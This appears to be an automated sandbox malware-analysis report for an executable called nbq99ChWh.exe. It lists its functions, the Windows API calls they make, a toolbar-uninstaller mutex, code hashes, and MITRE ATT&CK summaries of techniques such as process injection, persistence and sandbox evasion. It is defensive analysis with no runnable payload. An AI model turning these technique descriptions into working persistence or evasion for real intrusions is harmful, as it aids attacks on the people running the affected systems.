
Memory Dump Source

Source File: 00000027.00000003.2749348582.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2330000_mm3ujg.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: bcc5c87172ee948c1678ad3422c5c1a16bba851dab6ec52195f5c701c3658d86
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: F3A13870A00606EFDB1ACFA9C880AAEB7B5FF48318B1481A9E415DB751D730EA51CF90

Function 0233044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0233048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 023304F1

Memory Dump Source

Source File: 00000027.00000003.2749348582.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2330000_mm3ujg.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: b27d15b7ae867378807e14db78e68016459b6c350432e0190aaa3171e3e73abc
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: E221DB75B00305BBD7359EA48C84FAFB7F9AF04324F114568EA5AA2681D771AB019B60

Non-executed Functions

Function 023300CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

l, xrefs: 02330149
ntdl, xrefs: 02330142

Memory Dump Source

Source File: 00000027.00000003.2749348582.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2330000_mm3ujg.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: 669347f72fbb0ecebe65dd858465fc1992613a5adf0251b1c6bbe936ea877f4d
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: 491160B5701601AFCB2AEF58C508A0EBBF6FF88750B218159E10597750EB39DB218BD5

Function 02330643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

l, xrefs: 0233068E
ntdl, xrefs: 02330684

Memory Dump Source

Source File: 00000027.00000003.2749348582.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_2330000_mm3ujg.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: fa8b149c624aac2d693f757a2279bb4eced914293b2d70a7fe44fbed456de576
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: F8016172B00218AFDB15DB99C8459AEFBB9EF88654F044099F904A7360DA70DF008BA1

Analysis Process: nbq99ChWh.exePID: 1664, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1047
Total number of Limit Nodes:	29

Executed Functions

Function 008E1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 008E1006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 008E1013
GetLastError.KERNEL32 ref: 008E101F
GetCommandLineW.KERNEL32(?), ref: 008E1040
CommandLineToArgvW.SHELL32(00000000), ref: 008E1047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 008E1061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 008E1073
LoadLibraryW.KERNELBASE(?), ref: 008E1085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 008E1097
FreeLibrary.KERNELBASE(00000000), ref: 008E10A4
CloseHandle.KERNELBASE(00000000), ref: 008E10AB
CoUninitialize.COMBASE ref: 008E10B1
LocalFree.KERNEL32(00000000), ref: 008E10BC

Strings

tbcore3.dll, xrefs: 008E105C, 008E1067
MyUnregisterServer, xrefs: 008E1091
Global\IEToolbarUninstaller, xrefs: 008E100C
tbcore3U.dll, xrefs: 008E106E, 008E1079

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: 2d9d78eee7212cc3d0d256bf61a11eeea1307f2e62d890109191638fae6a9596
Instruction ID: 5c443f93b5a1669a0ce94227bf4c27d18fee7798974c67a56d9ef6d6f48f088c
Opcode Fuzzy Hash: 2d9d78eee7212cc3d0d256bf61a11eeea1307f2e62d890109191638fae6a9596
Instruction Fuzzy Hash: DE115632205EE4EB8B20ABA2AC8CA9F379CFE477217000424F68AD6150CF70CD05C7B2

Function 008E1465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 008E146D

Part of subcall function 008E143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,008E1472,?,?,008E54EE,000000FF,0000001E,?,008E36FC,?,00000001,?,?,008E2A2A,00000018), ref: 008E1444
Part of subcall function 008E143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008E1454

ExitProcess.KERNEL32 ref: 008E1476

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 94604dbb9ba9aa746635eb62003811c34ccb221143956a155fb2dfac361ca478
Instruction ID: 3b7c23de9ee5244d4f05319e320e6f48358fbc8a13060e5021031e344037141d
Opcode Fuzzy Hash: 94604dbb9ba9aa746635eb62003811c34ccb221143956a155fb2dfac361ca478
Instruction Fuzzy Hash: FDB09231000188FBDF122F16DC0E84D3F6AFB813A4B608020F80C89171DF72AE929AD5

Function 008E261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 008E2630

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: cf5585ef94fb9e6a308979aeeb9f653653e7869808539255646eacd419f28cb8
Instruction ID: 14438a5ff88a17ded50a5c0455a9cd72048485a8053627a727310b3c0cb8e5ff
Opcode Fuzzy Hash: cf5585ef94fb9e6a308979aeeb9f653653e7869808539255646eacd419f28cb8
Instruction Fuzzy Hash: A8D05E325543C49EDB009F716C88B263BECF384399F144475B90CCA1A0E670C5908A04

Function 008E1681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 008E168D

Part of subcall function 008E1555: __lock.LIBCMT ref: 008E1563
Part of subcall function 008E1555: __decode_pointer.LIBCMT ref: 008E159A
Part of subcall function 008E1555: __decode_pointer.LIBCMT ref: 008E15AF
Part of subcall function 008E1555: __decode_pointer.LIBCMT ref: 008E15D9
Part of subcall function 008E1555: __decode_pointer.LIBCMT ref: 008E15EF
Part of subcall function 008E1555: __decode_pointer.LIBCMT ref: 008E15FC
Part of subcall function 008E1555: __initterm.LIBCMT ref: 008E162B
Part of subcall function 008E1555: __initterm.LIBCMT ref: 008E163B

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 0b30c8b5d73e3edb5d0a57ead7bc058fafc79ad09ed6927ed47a354074f373b4
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: A7B0927258024833DB20258AAC07F063A0997C1BA0F250020FA0C191E1A9A2A961808A

Non-executed Functions

Function 008E10CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 008E1346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008E135B
UnhandledExceptionFilter.KERNEL32(008E816C), ref: 008E1366
GetCurrentProcess.KERNEL32(C0000409), ref: 008E1382
TerminateProcess.KERNEL32(00000000), ref: 008E1389

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8821a16855ffbf4cad6cec65ce350e252c1a9869bbde650389e72b7f7823f17f
Instruction ID: fb1f186a43eb08e6f5275f38e85b0e69e27e0ec5a5e97f3b0cb42864e023d4ce
Opcode Fuzzy Hash: 8821a16855ffbf4cad6cec65ce350e252c1a9869bbde650389e72b7f7823f17f
Instruction Fuzzy Hash: B721F2B46016C4DFC759DF29EDC46083BB4FB48B12F11401AE5088FA60DB796988CF46

Function 008E21E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,008E9458,0000000C,008E2320,00000000,00000000,?,008E174F,00000003,?,?,?,?,?,?,008E10F6), ref: 008E21F7
__crt_waiting_on_module_handle.LIBCMT ref: 008E2202

Part of subcall function 008E13E1: Sleep.KERNEL32(000003E8,00000000,?,008E2148,KERNEL32.DLL,?,008E2194,?,008E174F,00000003), ref: 008E13ED
Part of subcall function 008E13E1: GetModuleHandleW.KERNEL32(?,?,008E2148,KERNEL32.DLL,?,008E2194,?,008E174F,00000003,?,?,?,?,?,?,008E10F6), ref: 008E13F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 008E222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 008E223B
__lock.LIBCMT ref: 008E225D
InterlockedIncrement.KERNEL32(008EA4D8), ref: 008E226A
__lock.LIBCMT ref: 008E227E
___addlocaleref.LIBCMT ref: 008E229C

Strings

EncodePointer, xrefs: 008E221F
DecodePointer, xrefs: 008E2233
KERNEL32.DLL, xrefs: 008E21F1, 008E21F6, 008E2201

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 006966e313e0cc03103f17343a189eaf160e1ade3c7a047afccc9c575d460915
Instruction ID: 0a443b70174bb34d7c294b73051cf64e1268668ea5a1d739f9764a9f3a450466
Opcode Fuzzy Hash: 006966e313e0cc03103f17343a189eaf160e1ade3c7a047afccc9c575d460915
Instruction Fuzzy Hash: EF11C070800B80DED720EF7BD845B4EBBE4FF56310F204519E5A9E73A0CBB4A9448B26

Function 008E40A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 008E40AC

Part of subcall function 008E2345: __getptd_noexit.LIBCMT ref: 008E2348
Part of subcall function 008E2345: __amsg_exit.LIBCMT ref: 008E2355

__amsg_exit.LIBCMT ref: 008E40CC
__lock.LIBCMT ref: 008E40DC
InterlockedDecrement.KERNEL32(?), ref: 008E40F9
InterlockedIncrement.KERNEL32(029D2AF0), ref: 008E4124

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 0d69fcf6dcd01ee0fd723c9f15a60ddc68a300f4d5f460f2ccb70f921e22ad2c
Instruction ID: 1129ea6590ddd26031c9b326e21bbbc9ec27efb7477a32d18b3b15f9ad858ec6
Opcode Fuzzy Hash: 0d69fcf6dcd01ee0fd723c9f15a60ddc68a300f4d5f460f2ccb70f921e22ad2c
Instruction Fuzzy Hash: 9501ED31901AA19BCB65AF2B888634C7760FB02B10F054014E918EB691CB34AD81CB97

Function 008E35EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 008E360C

Part of subcall function 008E2AA0: __mtinitlocknum.LIBCMT ref: 008E2AB6
Part of subcall function 008E2AA0: __amsg_exit.LIBCMT ref: 008E2AC2
Part of subcall function 008E2AA0: EnterCriticalSection.KERNEL32(?,?,?,008E5600,00000004,008E9628,0000000C,008E3746,?,?,00000000,00000000,00000000,?,008E22F7,00000001), ref: 008E2ACA

___sbh_find_block.LIBCMT ref: 008E3617
___sbh_free_block.LIBCMT ref: 008E3626
HeapFree.KERNEL32(00000000,?,008E9568,0000000C,008E2A81,00000000,008E94C8,0000000C,008E2ABB,?,?,?,008E5600,00000004,008E9628,0000000C), ref: 008E3656
GetLastError.KERNEL32(?,008E5600,00000004,008E9628,0000000C,008E3746,?,?,00000000,00000000,00000000,?,008E22F7,00000001,00000214), ref: 008E3667

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: e236a0248553c513afcb9bd16e48561bbede07d5c14b5cfac3f93062b2c188bf
Instruction ID: 3437fdfb2b1cc050f45eccf05e59b482626e28c4b7b487ec20b2e89063ec88a2
Opcode Fuzzy Hash: e236a0248553c513afcb9bd16e48561bbede07d5c14b5cfac3f93062b2c188bf
Instruction Fuzzy Hash: 2D016271D043C5BBDB216B779C0AB5E36A8FF23760F604159F444EB2A1CB748A40DA5A

Function 008E3E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 008E3E10

Part of subcall function 008E2345: __getptd_noexit.LIBCMT ref: 008E2348
Part of subcall function 008E2345: __amsg_exit.LIBCMT ref: 008E2355

__getptd.LIBCMT ref: 008E3E27
__amsg_exit.LIBCMT ref: 008E3E35
__lock.LIBCMT ref: 008E3E45

Memory Dump Source

Source File: 00000029.00000002.2757459613.00000000008E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000029.00000002.2757428225.00000000008E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757558906.00000000008EA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2757602792.00000000008EC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_8e0000_nbq99ChWh.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 48ab12f5f93af1a5e73b7c9731aefa078e58110518fe320604cb8cdfcdfecb67
Instruction ID: f75e0b4bc99f2b3e85b1edfddee8c0cdd4792e6413282d1d9ec83e11d8189145
Opcode Fuzzy Hash: 48ab12f5f93af1a5e73b7c9731aefa078e58110518fe320604cb8cdfcdfecb67
Instruction Fuzzy Hash: 41F09032A003929BD720BB7F840A74D73A4FF56B10F114259E451DB7E1CB74AE018B53

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

